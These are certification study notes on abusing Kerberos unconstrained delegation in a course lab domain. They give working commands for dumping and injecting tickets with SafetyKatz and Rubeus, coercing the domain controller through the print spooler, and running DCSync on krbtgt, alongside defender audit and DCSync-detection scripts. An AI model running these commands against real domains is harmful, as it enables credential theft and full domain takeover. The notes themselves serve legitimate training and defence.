Certified Red Team Professional (CRTP) - Notes

Unconstrained Delegation

Unconstrained Delegation

Unconstrained delegation allows a service to impersonate a user to any other service in the domain. When this is enabled, the domain controller includes the user's TGT in the TGS. The TGT is then extracted by the service and stored in LSASS, allowing it to be reused for impersonation. This behavior makes unconstrained delegation highly abusable.

Delegation Process Flow:

  1. A user authenticates to the Domain Controller and receives a TGT.

  2. The user requests a TGS for a service (e.g., a web server).

  3. The user sends both the TGT and the TGS to the service.

  4. The service extracts the user's TGT and requests a new TGS to access another resource (e.g., a database server).

  5. The service authenticates to the second server as the user.


Enumeration

To identify domain machines or users with unconstrained delegation enabled:

  • PowerView:

    Get-DomainComputer -Unconstrained
  • ActiveDirectory Module:

    Get-ADComputer -Filter {TrustedForDelegation -eq $True}
    Get-ADUser -Filter {TrustedForDelegation -eq $True}
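The same check written against raw LDAP, as an added defender-side example (not part of the course material, PowerView or the ActiveDirectory module). It assumes it runs from a domain-joined host and that the bit values quoted in the comments are the ones PowerView's `-Unconstrained` and the `TrustedForDelegation` filter resolve to:

```powershell
# Audit unconstrained delegation with plain ADSI/LDAP (no PowerView or RSAT needed).
# TRUSTED_FOR_DELEGATION (0x80000) is the userAccountControl bit that both
# Get-DomainComputer -Unconstrained and the TrustedForDelegation filters resolve to.
# Domain controllers carry the bit by default, so they are reported as expected;
# member servers and user accounts with it are the findings to remediate.
function Get-UnconstrainedDelegationAudit {
    param(
        # Search base; defaults to the current domain of the joined host (assumption)
        [string]$SearchBase = ([ADSI]'LDAP://RootDSE').defaultNamingContext
    )
    $TRUSTED_FOR_DELEGATION = 0x80000   # 524288
    $SERVER_TRUST_ACCOUNT   = 0x2000    # 8192, set only on DC computer accounts

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule
    $searcher.Filter = "(&(|(objectCategory=computer)(objectCategory=person))" +
        "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION))"
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('samAccountName', 'objectCategory', 'userAccountControl', 'dNSHostName'))

    foreach ($r in $searcher.FindAll()) {
        $uac        = [int]$r.Properties['useraccountcontrol'][0]
        $isComputer = [string]$r.Properties['objectcategory'][0] -like 'CN=Computer,*'
        $isDC       = $isComputer -and (($uac -band $SERVER_TRUST_ACCOUNT) -ne 0)

        $finding = 'Critical: user account trusted for unconstrained delegation'
        if ($isDC)           { $finding = 'Expected: domain controller' }
        elseif ($isComputer) { $finding = 'High: member server trusted for unconstrained delegation' }

        [pscustomobject]@{
            Account = [string]$r.Properties['samaccountname'][0]
            Type    = if ($isComputer) { 'Computer' } else { 'User' }
            DnsName = if ($isComputer) { [string]$r.Properties['dnshostname'][0] } else { '' }
            Finding = $finding
        }
    }
}

# Example run: findings sort ahead of the expected DC entries
Get-UnconstrainedDelegationAudit | Sort-Object Finding | Format-Table -AutoSize
```

Member servers in the output are the dcorp-appsrv pattern used in the lab; the usual fixes are moving them to constrained delegation and placing privileged accounts in Protected Users or marking them "Account is sensitive and cannot be delegated".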

Abusing Unconstrained Delegation

  1. Compromise a server with unconstrained delegation enabled.

  2. Wait for or coerce a domain admin to authenticate to it.

  3. Dump cached TGTs:

    SafetyKatz.exe "sekurlsa::tickets /export"
  4. Inject a Domain Admin’s TGT:

    SafetyKatz.exe "kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"

Coercion Techniques

Certain Windows services allow any authenticated user to coerce one machine into authenticating to another. These include:

| Protocol | Service            | Default Enabled | Port    |
|----------|--------------------|-----------------|---------|
| MS-RPRN  | Print Spooler      | Yes             | 445 SMB |
| MS-WSP   | Windows Search     | No              | 445 SMB |
| MS-DFSNM | DFS Namespace Mgmt | No              | 445 SMB |

Use these coercion techniques to force authentication from a DC to a controlled host.


Capturing and Reusing the TGT

  1. On the attacker's controlled server (e.g., dcorp-appsrv), monitor for TGTs:

    Rubeus.exe monitor /interval:5 /nowrap
  2. On the student's VM, coerce authentication using MS-RPRN:

    MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
  3. Once the TGT is captured (Base64 encoded), inject it into memory:

    Rubeus.exe ptt /ticket:<Base64_TGT>
  4. Dump secrets using DCSync:

    SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt"
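A detection-side counterpart to the last step, added here as an example (not part of the course material): the DCSync in step 4 is served by the directory replication RPC, and the domain controller records each such call as Security Event 4662 carrying the replication control-access right GUIDs. It assumes it runs on a DC with "Audit Directory Service Access" (success) enabled; `$ApprovedReplicators` is a placeholder for any legitimate non-DC replicator the environment has.

```powershell
# Hunt for DCSync on a domain controller: lsadump::dcsync pulls secrets through the
# replication RPC, and the DC records that as Event 4662 whose Properties field
# lists the replication control-access right GUIDs. Only DC computer accounts (and
# any approved replicators you list) should ever exercise them. Assumes it runs on
# a DC with "Audit Directory Service Access" (success) enabled.
function Find-DCSyncEvents {
    param(
        [datetime]$StartTime = (Get-Date).AddHours(-24),
        [string[]]$ApprovedReplicators = @()   # placeholder, e.g. a directory-sync service account
    )
    $replicationRights = @{
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
        '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    }
    # Short host names of the DCs in the current domain, e.g. DCORP-DC
    $dcNames = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers |
        ForEach-Object { ($_.Name -split '\.')[0].ToUpperInvariant() }

    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = $StartTime }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $data = @{}
        foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
        $rights = $replicationRights.Keys | Where-Object { $data['Properties'] -match $_ } |
            ForEach-Object { $replicationRights[$_] }
        if (-not $rights) { continue }

        # DC computer accounts (NAME$) replicate legitimately; anything else is the alert
        $subject = [string]$data['SubjectUserName']
        $isDC = $subject.EndsWith('$') -and ($subject.TrimEnd('$').ToUpperInvariant() -in $dcNames)
        if ($isDC -or ($subject -in $ApprovedReplicators)) { continue }

        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            Subject     = "$($data['SubjectDomainName'])\$subject"
            Rights      = ($rights -join ', ')
            Object      = $data['ObjectName']   # the naming context that was replicated
        }
    }
}

Find-DCSyncEvents | Format-Table -AutoSize
```

A hit here for a user such as the one whose TGT was injected in step 3 is the end of the chain; correlating it with the same account's 4624 logon on the unconstrained-delegation host closes the loop back to the coercion.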

Lab

  • Learning Object 15

Labs

  • Learning Object 16 lab

  • Learning Object 17 lab